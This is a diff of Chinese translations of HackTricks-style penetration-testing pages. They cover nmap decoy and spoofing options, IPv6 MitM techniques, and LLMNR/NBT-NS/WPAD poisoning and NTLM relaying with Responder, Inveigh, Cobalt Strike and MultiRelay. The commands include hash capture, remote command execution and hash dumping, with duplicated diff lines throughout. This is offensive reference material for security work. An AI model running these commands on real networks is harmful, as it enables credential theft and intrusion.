**-D decoy1,decoy2,ME** Nmap发送扫描器,但使用其他 IP 地址作为源,以隐藏您的真实 IP。如果将 ME 放在列表中,Nmap 将把您放在那里,最好在您之前放置 5 或 6 个以完全掩盖您的身份。可以使用 RND:\<number> 生成随机 IP。不适用于无 TCP 连接的版本检测。如果在网络内部,最好使用活动 IP,否则很容易发现您是唯一活动的。
|
||||
**-D decoy1,decoy2,ME** Nmap发送扫描器,但使用其他IP地址作为源,以隐藏您的真实IP地址。如果在列表中放置ME,Nmap会将您放在那里,最好在您之前放置5或6个以完全掩盖您的身份。可以使用RND:\<number>生成随机IP。不适用于无TCP连接的版本检测。如果在网络内部,最好使用活动IP地址,否则很容易发现您是唯一活动的。
|
||||
|
||||
要使用随机 IP:nmap-D RND: 10 Ip_target
|
||||
要使用随机IP地址:nmap-D RND: 10 Ip_target
|
||||
|
||||
**-S IP** 当 Nmap 无法获取您的 IP 地址时,您需要使用此选项提供它。也可用于让其他目标认为有其他目标在扫描它们。
|
||||
**-S IP** 当Nmap无法获取您的IP地址时,您需要使用此选项提供IP地址。也可用于让目标认为有其他扫描目标。
|
||||
|
||||
**-e \<interface>** 选择接口
|
||||
|
||||
许多管理员会保留入站端口以确保一切正常运行,这样更容易而不是寻找其他解决方案。这些可能是 DNS 或 FTP 端口... 为了查找此漏洞,nmap 提供了:**--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _等效_
|
||||
许多管理员会保持入口端口开放以确保一切正常运行,这样更容易而不是寻找其他解决方案。这些可能是DNS端口或FTP端口...为了查找此漏洞,nmap提供:**--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _等效_
|
||||
|
||||
**--data** _**\<hex string>**_ 用于发送十六进制文本:--data 0xdeadbeef 和 --data \xCA\xFE\x09
|
||||
|
||||
**--data-string** _**\<string>**_ 用于发送普通文本:--data-string "Scan conducted by Security Ops, extension 7192"
|
||||
|
||||
**--data-length** _**\<number>**_ Nmap 仅发送头部,使用此选项可使其添加指定数量的字节(将随机生成)
|
||||
**--data-length** _**\<number>**_ Nmap仅发送头部,使用此选项可使其添加指定数量的字节(将随机生成)
|
||||
|
||||
要完全配置 IP 数据包,请使用 **--ip-options**
|
||||
要完全配置IP数据包,请使用**--ip-options**
|
||||
|
||||
如果希望查看发送和接收的数据包选项,请指定 --packet-trace。有关使用 IP 选项的更多信息和示例,请参阅 [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52)。
|
||||
如果要查看发送和接收的数据包选项,请指定--packet-trace。有关使用Nmap的IP选项的更多信息和示例,请参阅[http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52)。
|
||||
|
||||
**--ttl** _**\<value>**_
|
||||
|
||||
**--randomize-hosts** 使攻击不那么明显
|
||||
|
||||
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ 更改 MAC 地址的选项,例如:Apple、0、01:02:03:04:05:06、deadbeefcafe、0020F2 和 Cisco
|
||||
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ 更改MAC地址的选项,例如:Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
|
||||
**--proxies** _**\<逗号分隔的代理URL列表>**_ 有时代理无法保持nmap所需的连接数,因此需要调整并行性:--max-parallelism
|
||||
|
||||
**-sP** 用于通过ARP发现网络中的主机
|
||||
**-sP** 通过ARP发现网络中的主机
|
||||
|
||||
许多管理员在防火墙中创建规则,允许通过特定端口(如20、53和67)传递所有数据包,我们可以告诉nmap从这些端口发送我们的数据包:**nmap --source-port 53 Ip**
|
||||
|
||||
|
@ -210,7 +211,7 @@ Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,
|
|||
|
||||
**--packet-trace** 查看发送的数据包,可以指定过滤器,如:--version-trace或--script-trace
|
||||
|
||||
**--open** 显示开放、开放|过滤和未过滤的端口
|
||||
**--open** 显示开放、开放|被过滤和未过滤的端口
|
||||
|
||||
**--resume file** 生成摘要
|
||||
|
||||
|
@ -222,7 +223,7 @@ Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,
|
|||
|
||||
**运行时**
|
||||
|
||||
在运行nmap时,可以更改选项:
|
||||
在nmap运行时,可以更改选项:
|
||||
|
||||
v / V 增加/减少冗长级别
|
||||
|
||||
|
@ -236,7 +237,7 @@ p / P 打开/关闭数据包跟踪
|
|||
|
||||
nmap的脚本,查看从离线数据库(从其他重要数据库下载)获取的服务版本,并返回可能的漏洞
|
||||
|
||||
它使用的数据库包括:
|
||||
使用的数据库包括:
|
||||
|
||||
1. Scipvuldb.csv | [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
|
||||
2. Cve.csv | [http://cve.mitre.org](http://cve.mitre.org/)
|
||||
|
@ -247,40 +248,22 @@ nmap的脚本,查看从离线数据库(从其他重要数据库下载)获
|
|||
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
|
||||
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
|
||||
|
||||
要下载并安装到Nmap文件夹中:
|
||||
下载并安装到Nmap文件夹:
|
||||
|
||||
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
|
||||
|
||||
还需要下载数据库包并将其添加到/usr/share/nmap/scripts/vulscan/
|
||||
还需下载数据库包并添加到/usr/share/nmap/scripts/vulscan/
|
||||
|
||||
用法:
|
||||
|
||||
要使用所有数据库:sudo nmap -sV --script=vulscan HOST\_TO\_SCAN
|
||||
使用所有数据库:sudo nmap -sV --script=vulscan HOST\_TO\_SCAN
|
||||
|
||||
要使用特定数据库:sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_TO\_SCAN
|
||||
使用特定数据库:sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_TO\_SCAN
|
||||
|
||||
## 加快Nmap服务扫描速度 x16
|
||||
|
||||
根据[**这篇文章**](https://joshua.hu/nmap-speedup-service-scanning-16x),您可以通过将**`/usr/share/nmap/nmap-service-probes`**中的所有**`totalwaitms`**值修改为**300**,**`tcpwrappedms`**修改为**200**来加快nmap服务分析速度。
|
||||
根据[**此帖子**](https://joshua.hu/nmap-speedup-service-scanning-16x),您可以通过修改**`/usr/share/nmap/nmap-service-probes`**中所有**`totalwaitms`**值为**300**,**`tcpwrappedms`**为**200**来加快nmap服务分析速度。
|
||||
|
||||
此外,没有明确定义**`servicewaitms`**的探测使用默认值**`5000`**。因此,我们可以为每个探测添加值,或者我们可以**自行编译nmap**并更改[**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79)中的默认值。
|
||||
此外,没有明确定义**`servicewaitms`**的探测使用默认值**`5000`**。因此,我们可以为每个探测添加值,或者我们可以自己**编译nmap**并在[**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79)中更改默认值。
|
||||
|
||||
如果您不想在`/usr/share/nmap/nmap-service-probes`文件中完全更改**`totalwaitms`**和**`tcpwrappedms`**的值,可以编辑[parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358),使得`nmap-service-probes`文件中的这些值完全被忽略。
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)系列
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,41 +1,42 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# IPv6基础理论
|
||||
# IPv6 基础理论
|
||||
|
||||
## 网络
|
||||
|
||||
IPv6地址被结构化以增强网络组织和设备交互。IPv6地址分为:
|
||||
IPv6 地址被结构化以增强网络组织和设备交互。IPv6 地址分为:
|
||||
|
||||
1. **网络前缀**:前48位,确定网络段。
|
||||
2. **子网ID**:接下来的16位,用于定义网络中的特定子网。
|
||||
3. **接口标识符**:最后的64位,唯一标识子网内的设备。
|
||||
1. **网络前缀**:初始的 48 位,确定网络段。
|
||||
2. **子网 ID**:接下来的 16 位,用于定义网络中特定子网。
|
||||
3. **接口标识符**:最后的 64 位,唯一标识子网内的设备。
|
||||
|
||||
虽然IPv6省略了IPv4中的ARP协议,但引入了带有两个主要消息的**ICMPv6**:
|
||||
- **邻居请求(NS)**:用于地址解析的多播消息。
|
||||
- **邻居通告(NA)**:对NS的单播响应或自发公告。
|
||||
虽然 IPv6 不包含在 IPv4 中找到的 ARP 协议,但引入了 **ICMPv6**,具有两个主要消息:
|
||||
- **邻居请求 (NS)**:用于地址解析的多播消息。
|
||||
- **邻居通告 (NA)**:对 NS 的单播响应或自发公告。
|
||||
|
||||
IPv6还包括特殊的地址类型:
|
||||
- **环回地址(`::1`)**:相当于IPv4的`127.0.0.1`,用于主机内部通信。
|
||||
- **链路本地地址(`FE80::/10`)**:用于本地网络活动,不用于互联网路由。在同一本地网络上的设备可以使用此范围相互发现。
|
||||
IPv6 还包括特殊的地址类型:
|
||||
- **环回地址 (`::1`)**:相当于 IPv4 的 `127.0.0.1`,用于主机内部通信。
|
||||
- **链路本地地址 (`FE80::/10`)**:用于本地网络活动,不用于互联网路由。在同一本地网络上的设备可以使用此范围相互发现。
|
||||
|
||||
### 在网络命令中实际使用IPv6
|
||||
### 在网络命令中实际使用 IPv6
|
||||
|
||||
要与IPv6网络交互,您可以使用各种命令:
|
||||
- **Ping链路本地地址**:使用`ping6`检查本地设备的存在。
|
||||
- **邻居发现**:使用`ip neigh`查看在链路层发现的设备。
|
||||
要与 IPv6 网络交互,您可以使用各种命令:
|
||||
- **Ping 链路本地地址**:使用 `ping6` 检查本地设备的存在。
|
||||
- **邻居发现**:使用 `ip neigh` 查看在链路层发现的设备。
|
||||
- **alive6**:用于在同一网络上发现设备的替代工具。
|
||||
|
||||
以下是一些命令示例:
|
||||
|
@ -50,19 +51,19 @@ alive6 eth0
|
|||
|
||||
给定一个MAC地址 **`12:34:56:78:9a:bc`**,您可以按照以下步骤构建Link-local IPv6地址:
|
||||
|
||||
1. 将MAC转换为IPv6格式:**`1234:5678:9abc`**
|
||||
1. 将MAC地址转换为IPv6格式:**`1234:5678:9abc`**
|
||||
2. 在开头加上 `fe80::` 并在中间插入 `fffe`:**`fe80::1234:56ff:fe78:9abc`**
|
||||
3. 反转从左起第七位,将 `1234` 改为 `1034`:**`fe80::1034:56ff:fe78:9abc`**
|
||||
|
||||
## **IPv6地址类型**
|
||||
|
||||
- **唯一本地地址 (ULA)**:用于本地通信,不用于公共互联网路由。前缀:**`FEC00::/7`**
|
||||
- **组播地址**:用于一对多通信。传送到组播组中的所有接口。前缀:**`FF00::/8`**
|
||||
- **组播地址**:用于一对多通信。传送到组播组中所有接口。前缀:**`FF00::/8`**
|
||||
- **任播地址**:用于一对最近通信。根据路由协议发送到最近的接口。属于全局单播范围 **`2000::/3`** 的一部分。
|
||||
|
||||
## **地址前缀**
|
||||
- **fe80::/10**:链路本地地址 (类似于169.254.x.x)
|
||||
- **fc00::/7**:唯一本地单播 (类似于私有IPv4范围如10.x.x.x, 172.16.x.x, 192.168.x.x)
|
||||
- **fe80::/10**:链路本地地址 (类似于 169.254.x.x)
|
||||
- **fc00::/7**:唯一本地单播 (类似于私有IPv4范围如 10.x.x.x, 172.16.x.x, 192.168.x.x)
|
||||
- **2000::/3**:全局单播
|
||||
- **ff02::1**:组播所有节点
|
||||
- **ff02::2**:组播路由器节点
|
||||
|
@ -81,29 +82,29 @@ ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
|
|||
ip -6 neigh # Display the neighbor table
|
||||
```
|
||||
## IPv6中间人攻击(MitM)攻击
|
||||
在IPv6网络中执行MitM攻击有几种技术,例如:
|
||||
在IPv6网络中执行MitM攻击存在几种技术,例如:
|
||||
|
||||
- 伪造ICMPv6邻居或路由器通告。
|
||||
- 使用ICMPv6重定向或“数据包太大”消息来操纵路由。
|
||||
- 使用ICMPv6重定向或“数据包过大”消息来操纵路由。
|
||||
- 攻击移动IPv6(通常需要禁用IPSec)。
|
||||
- 设置一个恶意的DHCPv6服务器。
|
||||
- 设置一个恶意DHCPv6服务器。
|
||||
|
||||
|
||||
# 在野外识别IPv6地址
|
||||
|
||||
## 探索子域
|
||||
一种查找潜在链接到IPv6地址的子域的方法涉及利用搜索引擎。例如,使用类似`ipv6.*`的查询模式可能是有效的。具体来说,可以在Google中使用以下搜索命令:
|
||||
一种查找可能与IPv6地址相关联的子域的方法涉及利用搜索引擎。例如,使用类似`ipv6.*`的查询模式可能是有效的。具体来说,可以在Google中使用以下搜索命令:
|
||||
```bash
|
||||
site:ipv6./
|
||||
```
|
||||
## 利用 DNS 查询
|
||||
要识别 IPv6 地址,可以查询特定的 DNS 记录类型:
|
||||
要识别 IPv6 地址,可以查询某些 DNS 记录类型:
|
||||
- **AXFR**:请求完整的区域传输,可能会揭示各种 DNS 记录。
|
||||
- **AAAA**:直接寻找 IPv6 地址。
|
||||
- **ANY**:一个广泛的查询,返回所有可用的 DNS 记录。
|
||||
- **ANY**:返回所有可用的 DNS 记录的广泛查询。
|
||||
|
||||
## 使用 Ping6 进行探测
|
||||
在确定与组织相关联的 IPv6 地址后,可以使用 `ping6` 实用程序进行探测。该工具有助于评估已识别的 IPv6 地址的响应性,并可能还有助于发现相邻的 IPv6 设备。
|
||||
在确定与组织相关联的 IPv6 地址后,可以使用 `ping6` 实用程序进行探测。该工具有助于评估已识别的 IPv6 地址的响应能力,并可能还有助于发现相邻的 IPv6 设备。
|
||||
|
||||
|
||||
## 参考资料
|
||||
|
@ -112,16 +113,17 @@ site:ipv6./
|
|||
* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的 **公司在 HackTricks 中做广告** 或 **下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,68 +1,69 @@
|
|||
# 伪造 LLMNR、NBT-NS、mDNS/DNS 和 WPAD 以及中继攻击
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践 AWS 黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践 GCP 黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
|
||||
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) 上**关注**我们。
|
||||
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 网络协议
|
||||
|
||||
### 本地主机解析协议
|
||||
- **LLMNR、NBT-NS 和 mDNS**:
|
||||
- Microsoft 和其他操作系统在 DNS 失败时使用 LLMNR 和 NBT-NS 进行本地名称解析。同样,Apple 和 Linux 系统使用 mDNS。
|
||||
- 由于它们在 UDP 上的未经身份验证的广播特性,这些协议容易受到拦截和伪造的影响。
|
||||
- [Responder](https://github.com/lgandx/Responder) 可以通过向查询这些协议的主机发送伪造响应来用于冒充服务。
|
||||
- 可在[此处](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)找到有关使用 Responder 进行服务冒充的更多信息。
|
||||
- 这些协议易受拦截和伪造攻击的影响,因为它们通过 UDP 的未经身份验证的广播方式传输。
|
||||
- [Responder](https://github.com/lgandx/Responder) 可以通过向查询这些协议的主机发送伪造响应来冒充服务。
|
||||
- 可以在[这里](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)找到有关使用 Responder 进行服务冒充的更多信息。
|
||||
|
||||
### Web 代理自动发现协议(WPAD)
|
||||
### Web 代理自动发现协议 (WPAD)
|
||||
- WPAD 允许浏览器自动发现代理设置。
|
||||
- 通过 DHCP、DNS 或在 DNS 失败时回退到 LLMNR 和 NBT-NS 来进行发现。
|
||||
- Responder 可以自动执行 WPAD 攻击,将客户端重定向到恶意的 WPAD 服务器。
|
||||
- Responder 可以自动化 WPAD 攻击,将客户端重定向到恶意的 WPAD 服务器。
|
||||
|
||||
### Responder 用于协议毒化
|
||||
- **Responder** 是一种用于毒化 LLMNR、NBT-NS 和 mDNS 查询的工具,根据查询类型有选择性地进行响应,主要针对 SMB 服务。
|
||||
- 它预装在 Kali Linux 中,可在 `/etc/responder/Responder.conf` 中进行配置。
|
||||
- Responder 会在屏幕上显示捕获的哈希值,并将其保存在 `/usr/share/responder/logs` 目录中。
|
||||
- **Responder** 是一种用于毒化 LLMNR、NBT-NS 和 mDNS 查询的工具,根据查询类型有选择性地响应,主要针对 SMB 服务。
|
||||
- 它预装在 Kali Linux 中,可在 `/etc/responder/Responder.conf` 中配置。
|
||||
- Responder 在屏幕上显示捕获的哈希值,并将其保存在 `/usr/share/responder/logs` 目录中。
|
||||
- 它支持 IPv4 和 IPv6。
|
||||
- 可在[此处](https://github.com/lgandx/Responder-Windows)获取 Responder 的 Windows 版本。
|
||||
- Responder 的 Windows 版本可在[这里](https://github.com/lgandx/Responder-Windows)找到。
|
||||
|
||||
#### 运行 Responder
|
||||
- 使用默认设置运行 Responder:`responder -I <Interface>`
|
||||
- 进行更积极的探测(可能会产生副作用):`responder -I <Interface> -P -r -v`
|
||||
- 通过技术捕获 NTLMv1 挑战/响应以便更轻松地破解:`responder -I <Interface> --lm --disable-ess`
|
||||
- 可以通过以下方式激活 WPAD 冒充:`responder -I <Interface> --wpad`
|
||||
- NetBIOS 请求可以解析为攻击者的 IP,并可以设置身份验证代理:`responder.py -I <interface> -Pv`
|
||||
- NetBIOS 请求可以解析为攻击者的 IP,可以设置身份验证代理:`responder.py -I <interface> -Pv`
|
||||
|
||||
### 使用 Responder 进行 DHCP 毒化
|
||||
- 伪造 DHCP 响应可以永久毒化受害者的路由信息,提供了比 ARP 毒化更隐蔽的替代方案。
|
||||
- 需要精确了解目标网络的配置。
|
||||
- 运行攻击:`./Responder.py -I eth0 -Pdv`
|
||||
- 该方法可以有效地捕获 NTLMv1/2 哈希,但需要小心处理以避免网络中断。
|
||||
- 这种方法可以有效地捕获 NTLMv1/2 哈希,但需要小心处理以避免网络中断。
|
||||
|
||||
### 使用 Responder 捕获凭据
|
||||
- Responder 将使用上述协议冒充服务,捕获凭据(通常是 NTLMv2 挑战/响应),当用户尝试对伪造的服务进行身份验证时。
|
||||
- 可尝试降级到 NetNTLMv1 或禁用 ESS 以便更轻松地破解凭据。
|
||||
- Responder 将使用上述协议冒充服务,捕获凭据(通常是 NTLMv2 挑战/响应),当用户尝试对冒充的服务进行身份验证时。
|
||||
- 可以尝试降级到 NetNTLMv1 或禁用 ESS 以便更轻松地破解凭据。
|
||||
|
||||
需要强调的是,使用这些技术应该在合法和道德的前提下进行,确保获得适当的授权,避免造成干扰或未经授权的访问。
|
||||
需要强调的是,使用这些技术应该在合法和道德的前提下进行,确保获得适当的授权,避免干扰或未经授权访问。
|
||||
|
||||
## Inveigh
|
||||
|
||||
Inveigh 是专为 Windows 系统设计的渗透测试人员和红队人员工具。它提供类似于 Responder 的功能,执行伪造和中间人攻击。该工具已从 PowerShell 脚本发展为 C# 二进制文件,主要版本为 [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) 和 [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero)。详细的参数和说明可以在[**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters)中找到。
|
||||
Inveigh 是一款专为 Windows 系统设计的渗透测试人员和红队人员工具。它提供类似于 Responder 的功能,执行伪造和中间人攻击。该工具已经从 PowerShell 脚本发展为 C# 二进制文件,主要版本为 [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) 和 [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero)。详细的参数和说明可以在 [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) 中找到。
|
||||
|
||||
Inveigh 可通过 PowerShell 运行:
|
||||
Inveigh 可以通过 PowerShell 运行:
|
||||
```powershell
|
||||
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
|
||||
```
|
||||
或者作为C#二进制文件执行:
|
||||
或者作为一个C#二进制文件执行:
|
||||
```bash
|
||||
Inveigh.exe
|
||||
```
|
||||
|
@ -74,7 +75,7 @@ Inveigh.exe
|
|||
|
||||
#### 445端口转发和隧道
|
||||
|
||||
在直接网络引入不可行的情况下,需要转发和隧道化445端口上的流量。像[**PortBender**](https://github.com/praetorian-inc/PortBender)这样的工具有助于将端口445的流量重定向到另一个端口,在本地管理员访问用于驱动加载时至关重要。
|
||||
在直接网络引入不可行的情况下,需要转发和隧道化445端口上的流量。像[**PortBender**](https://github.com/praetorian-inc/PortBender)这样的工具有助于将端口445的流量重定向到另一个端口,这在本地管理员访问用于驱动加载时是必不可少的。
|
||||
|
||||
在Cobalt Strike中设置和操作PortBender:
|
||||
```bash
|
||||
|
@ -92,17 +93,17 @@ beacon> jobkill 0
|
|||
beacon> rportfwd stop 8445
|
||||
beacon> socks stop
|
||||
```
|
||||
### NTLM中继攻击的其他工具
|
||||
### 用于 NTLM 中继攻击的其他工具
|
||||
|
||||
- **Metasploit**:设置代理,本地和远程主机详细信息。
|
||||
- **smbrelayx**:一个用于中继SMB会话并执行命令或部署后门的Python脚本。
|
||||
- **MultiRelay**:Responder套件中的一个工具,用于中继特定用户或所有用户,执行命令或转储哈希。
|
||||
- **smbrelayx**:一个用于中继 SMB 会话并执行命令或部署后门的 Python 脚本。
|
||||
- **MultiRelay**:Responder 套件中的一个工具,用于中继特定用户或所有用户,执行命令或转储哈希。
|
||||
|
||||
每个工具都可以根据需要配置为通过SOCKS代理运行,即使只有间接网络访问也能进行攻击。
|
||||
每个工具都可以配置为通过 SOCKS 代理运行,即使具有间接网络访问权限也可以进行攻击。
|
||||
|
||||
### MultiRelay操作
|
||||
### MultiRelay 操作
|
||||
|
||||
从 _**/usr/share/responder/tools**_ 目录执行MultiRelay,针对特定的IP或用户。
|
||||
从 _**/usr/share/responder/tools**_ 目录执行 MultiRelay,针对特定的 IP 或用户。
|
||||
```bash
|
||||
python MultiRelay.py -t <IP target> -u ALL # Relay all users
|
||||
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
|
||||
|
@ -112,7 +113,7 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
|
|||
```
|
||||
### 强制 NTLM 登录
|
||||
|
||||
